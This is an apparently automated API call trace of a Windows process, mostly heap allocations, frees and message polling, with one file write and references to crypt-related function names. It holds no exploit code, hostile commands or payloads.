[0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0132.624] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0132.624] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0132.624] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1310) returned 0x2f4ac78 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0132.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1310) returned 0x2f4d2a8 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0132.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f4ac78 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0132.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1310) returned 0x2f4ac78 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f4d2a8 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0132.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1310) returned 0x2f4d2a8 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f4ac78 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0132.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f49960 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0132.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f48648 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f4bf90 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f46018 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0132.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f47330 | out: hHeap=0x970000) returned 1 [0132.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0132.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0132.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1310) returned 0x2f46018 [0132.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f4d2a8 | out: hHeap=0x970000) returned 1 [0132.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.630] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0132.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0132.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0132.630] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0132.630] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0132.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0132.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0132.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0132.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0132.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0132.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0132.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1310) returned 0x2f47330 [0132.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.631] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f47330*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f47330*, lpNumberOfBytesWritten=0x8cf5e4*=0x1310, lpOverlapped=0x0) returned 1 [0132.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0132.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f47330 | out: hHeap=0x970000) returned 1 [0132.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0132.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0132.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0132.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0132.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0132.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0132.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0132.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0132.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0132.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0132.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0132.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0132.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0132.634] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0132.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0132.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d68 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0132.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0132.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0132.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0132.635] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0132.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0132.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0132.635] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0132.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0132.636] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0132.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0132.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0132.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0132.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0132.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0132.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0132.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0132.637] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0132.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 